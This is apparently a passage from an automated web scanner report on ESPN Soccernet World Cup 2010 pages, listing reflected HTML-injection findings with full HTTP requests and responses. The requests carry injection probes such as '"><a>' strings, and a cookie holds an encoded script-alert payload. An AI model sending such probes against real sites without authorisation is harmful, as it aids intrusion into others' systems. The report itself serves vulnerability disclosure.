s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:27:13 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:27:13 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN33 Cache-Expires: Sat, 06 Nov 2010 23:32:12 GMT Content-Length: 82424 Connection: close Via: 8810-09/10 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>South Africa Footba ...[SNIP]... <a href="/worldcup2010/team?team=467&4c1ec"><a>0e9b1b1a4b5=1&_slug_=south-africa&4c1ec"> ...[SNIP]...
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c9049"><a>2c9ee8a6c83 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/468/slovakiac9049"><a>2c9ee8a6c83 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:28:25 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:28:25 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN16 Cache-Expires: Sat, 06 Nov 2010 23:33:25 GMT Content-Length: 81977 Connection: close Via: 8810-09/10 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Slovakia Football / ...[SNIP]... <a href="/worldcup2010/team?team=468&_slug_=slovakiac9049"><a>2c9ee8a6c83&topId=803490&linktext=Dutch+ease+to+2-1+win+against+Slovakia"> ...[SNIP]...
5.87. http://soccernet.espn.go.com/worldcup2010/team/_/team/468/slovakia [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://soccernet.espn.go.com
Path:
/worldcup2010/team/_/team/468/slovakia
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c864f"><a>dc103401107 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/468/slovakia?c864f"><a>dc103401107=1 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:25:17 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:25:17 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN07 Cache-Expires: Sat, 06 Nov 2010 23:30:17 GMT Content-Length: 82085 Connection: close Via: 8810-09/10 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Slovakia Football / ...[SNIP]... <a href="/worldcup2010/team?team=468&c864f"><a>dc103401107=1&_slug_=slovakia&c864f"> ...[SNIP]...
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 69682"><a>ede52c78078 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/472/slovenia69682"><a>ede52c78078 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:28:12 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:28:12 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN02 Cache-Expires: Sat, 06 Nov 2010 23:33:12 GMT Content-Length: 81860 Connection: close Via: 8810-09/10 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Slovenia Football / ...[SNIP]... <a href="/worldcup2010/team?team=472&_slug_=slovenia69682"><a>ede52c78078&topId=801122&linktext=Slovenia+come+to+terms+with+exit"> ...[SNIP]...
5.89. http://soccernet.espn.go.com/worldcup2010/team/_/team/472/slovenia [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://soccernet.espn.go.com
Path:
/worldcup2010/team/_/team/472/slovenia
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 64674"><a>258595f7676 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/472/slovenia?64674"><a>258595f7676=1 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:25:20 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:25:20 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN21 Cache-Expires: Sat, 06 Nov 2010 23:30:19 GMT Content-Length: 81968 Connection: close Via: 8810-09/10 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Slovenia Football / ...[SNIP]... <a href="/worldcup2010/team?team=472&64674"><a>258595f7676=1&_slug_=slovenia&64674"> ...[SNIP]...
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4db0a"><a>888baac8773 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/475/switzerland4db0a"><a>888baac8773 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:28:58 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:28:58 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN31 Cache-Expires: Sat, 06 Nov 2010 23:33:58 GMT Content-Length: 82022 Connection: close Via: 8810-09/10 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Switzerland Footbal ...[SNIP]... <a href="/worldcup2010/team?team=475&_slug_=switzerland4db0a"><a>888baac8773&topId=802287&linktext=Hitzfeld+says+pressure+cost+Swiss"> ...[SNIP]...
5.91. http://soccernet.espn.go.com/worldcup2010/team/_/team/475/switzerland [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://soccernet.espn.go.com
Path:
/worldcup2010/team/_/team/475/switzerland
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 82f0d"><a>d5df743ea71 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/475/switzerland?82f0d"><a>d5df743ea71=1 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:28:17 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:28:17 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN16 Cache-Expires: Sat, 06 Nov 2010 23:33:17 GMT Content-Length: 82130 Connection: close Via: 8810-09/10 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Switzerland Footbal ...[SNIP]... <a href="/worldcup2010/team?team=475&82f0d"><a>d5df743ea71=1&_slug_=switzerland&82f0d"> ...[SNIP]...
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fa8c8"><a>f460e0de5a0 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/478/francefa8c8"><a>f460e0de5a0 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:09:31 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:09:31 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN08 Cache-Expires: Sat, 06 Nov 2010 23:14:31 GMT Content-Length: 80435 Connection: close Via: 8810-07/08 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>France Football / S ...[SNIP]... <a href="/worldcup2010/team?team=478&_slug_=francefa8c8"><a>f460e0de5a0&topId=806664&linktext=New+France+coach+admits+concerns"> ...[SNIP]...
5.93. http://soccernet.espn.go.com/worldcup2010/team/_/team/478/france [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://soccernet.espn.go.com
Path:
/worldcup2010/team/_/team/478/france
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 80bf3"><a>247a72dcc41 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
